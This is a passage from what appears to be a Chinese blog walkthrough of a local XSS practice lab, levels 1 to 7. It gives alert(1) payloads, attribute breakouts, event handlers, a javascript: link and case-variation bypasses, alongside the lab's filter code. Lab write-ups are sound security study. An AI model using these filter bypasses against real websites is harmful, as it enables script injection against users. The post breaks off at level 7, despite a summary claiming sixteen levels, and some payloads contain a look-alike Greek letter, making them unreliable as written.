xss靶场练习

本文详细介绍了在XSS靶场中从Pass-1到Pass-16的各种过滤和绕过策略,包括利用单引号、事件触发、大小写绕过、cookie注入以及ng-include等方法进行攻击。通过审查元素和理解代码过滤机制,逐步揭示了如何在不同层级的防护下成功触发XSS漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

- Pass-1

127.0.0.1/xss/level1.php?name=<script>alert(1)</script>

在这里插入图片描述
通过
- Pass-2
直接插入不行,引号将其包裹起了
在这里插入图片描述

http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><--

在这里插入图片描述
- Pass-3
审查元素看看
在这里插入图片描述
看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都被校验了
可以集合单引号和事件来触发

‘ onclick='alert(1)

在这里插入图片描述

- Pass-4
在这里插入图片描述
可以看到对< >进行了过滤
由下图可以看出是双引号包裹得
在这里插入图片描述

" οnclick="alert(1)"

在这里插入图片描述
- Pass-5
在这里插入图片描述
对script进行了过滤
看了下还是双引号包裹

过滤了

" οnclick="alert(1)"

在这里插入图片描述
看手源码
在这里插入图片描述

"><a href='javascript:alert(1)'>  

在这里插入图片描述
- Pass-6
过滤

$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);

可大小写绕过

"><Script>alert(1)</script>

在这里插入图片描述
- Pass-7

ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值